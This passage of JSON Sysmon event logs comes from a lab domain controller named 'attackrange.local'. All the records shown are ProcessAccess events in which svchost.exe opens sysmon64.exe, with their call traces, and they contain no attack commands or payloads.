YSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5053,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5054,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5055,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5056,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5057,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5058,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5059,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5060,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
